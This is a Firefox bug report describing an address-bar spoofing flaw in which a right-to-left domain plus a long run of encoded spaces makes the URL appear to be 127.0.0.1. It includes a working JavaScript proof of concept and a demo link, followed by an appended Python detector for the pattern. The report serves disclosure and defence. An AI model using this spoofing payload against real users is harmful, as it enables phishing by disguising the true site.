Bug 1317654: Firefox RTL+Space URL Spoofing
Opened 8 years ago, closed 8 years ago
Categories: Core :: Layout: Text and Fonts, defect
Status: RESOLVED DUPLICATE of bug 1298584
People: Reporter: xisigr, Unassigned
Attachments: 1 file (1.64 MB, image/png)
VULNERABILITY DETAILS
RTL URLs put the IP address on the left side of the Firefox Omnibox. The Unicode character 'SPACE' (U+0020) is displayed as blank in the Chrome Omnibox. A lot of spaces will hide the real domain.
VERSION
Firefox Version: [49.0.2] + [stable]
Firefox Nightly Version: [53.0a1]
Operating System: [Windows 7 & 10, Mac 10.12.1]
REPRODUCTION CASE
POC:
<script>
function aa() {
  var link = document.createElement('a');
  link.href = "http://xn--ggbla1c4e.xn--ngbc5azd/?" + Array(0x100).join("%20") + "127.0.0.1";
  link.target = "aaaa";
  document.body.appendChild(link);
  link.click();
}
</script>
<a onclick="aa();" href="javascript:void(0);">CLICK ME</a>
Online Demo: http://xisigr.com/test/spoof/firefox/rtl.html
There is a wrong word in 'VULNERABILITY DETAILS: display blank in the Chrome Omnibox'; Chrome should be changed to Firefox. :)
Updated•8 years ago
Group: firefox-core-security → layout-core-security
Component: Security → Layout: Text
Product: Firefox → Core
Updated•8 years ago
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Updated•3 years ago
Group: layout-core-security
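
A defensive check for the pattern this report describes, added here as an example (it is not part of the original bug report or of Mozilla's code): it flags a URL whose host decodes to right-to-left script and whose path or query carries a long run of spaces followed by host-like text. The names `check_url`, `decode_label`, `MIN_PAD` and `HOSTLIKE` and the threshold of 16 spaces are assumptions; `POC_URL` is rebuilt from the PoC in the description.

```python
import re
import unicodedata
from urllib.parse import urlsplit, unquote

MIN_PAD = 16  # assumed threshold: consecutive spaces treated as padding
# Assumed pattern for "looks like a host": dotted IPv4 or a dotted domain name.
HOSTLIKE = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}|(?:[a-z0-9-]+\.)+[a-z]{2,})(?::\d+)?(?:/.*)?$",
    re.I)
# URL rebuilt from the PoC in this report (Array(0x100).join gives 255 copies).
POC_URL = "http://xn--ggbla1c4e.xn--ngbc5azd/?" + "%20" * 255 + "127.0.0.1"


def decode_label(label):
    """Return the Unicode form of one DNS label (xn-- A-label to U-label)."""
    if label.lower().startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except UnicodeError:
            return label  # malformed punycode: keep the label as written
    return label


def has_rtl(text):
    """True if any character has strong right-to-left directionality."""
    return any(unicodedata.bidirectional(c) in ("R", "AL") for c in text)


def check_url(url):
    """Report RTL host, longest space run, and host-like text after it."""
    parts = urlsplit(url)
    labels = (parts.hostname or "").split(".")
    host = ".".join(decode_label(label) for label in labels)
    # What follows the host in the address bar, with %20 decoded to spaces.
    tail = unquote(parts.path + "?" + parts.query)
    pad = max(map(len, re.findall(r" +", tail)), default=0)
    # Text after the last space is what ends up visually next to the host.
    decoy = tail.rsplit(" ", 1)[-1] if pad else ""
    decoy = decoy if HOSTLIKE.match(decoy) else ""
    rtl = has_rtl(host)
    return {"host": host, "rtl_host": rtl, "pad": pad, "decoy": decoy,
            "suspicious": bool(rtl and pad >= MIN_PAD and decoy)}


if __name__ == "__main__":
    print(check_url(POC_URL))
```

An RTL host on its own is legitimate, so the check only reports `suspicious` when all three signals are present together.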